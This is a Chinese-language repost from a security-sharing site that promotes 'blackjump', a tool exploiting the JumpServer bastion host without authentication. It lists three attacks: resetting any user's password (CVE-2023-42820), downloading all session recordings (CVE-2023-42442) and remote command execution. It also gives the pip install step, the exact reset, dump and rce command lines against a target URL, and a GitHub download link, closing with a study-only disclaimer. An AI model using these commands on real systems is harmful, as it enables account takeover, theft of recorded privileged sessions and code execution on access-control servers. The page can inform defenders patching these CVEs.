JumpServer堡垒机综合漏洞利用工具

华盟原创文章投稿奖励计划

工具介绍

JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021

 未授权任意用户密码重置 (CVE-2023-42820) 未授权一键下载所有操作录像 (CVE-2023-42442) 未授权任意命令执行漏洞 (RCE 2021)

安装使用

python3 -m pip install -r requirements.txt

CVE-2023-42820: 如果知道目标的用户名和邮箱可以指定 –user 和 –email 参数

python3 blackjump.py reset https://vulerability

自动草稿

CVE-2023-42442: output/ 目录下的 <uuid4>.tar 文件扔进 jumpserver播放器播放即可

python3 blackjump.py dump https://vulerability

自动草稿

RCE

python3 blackjump.py rce http(s)://vulerability

自动草稿

帮助:

python3 blackjump.py {reset,dump,rce} -h

下载地址

https://github.com/tarihub/blackjump

文章来源:Hack分享吧

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容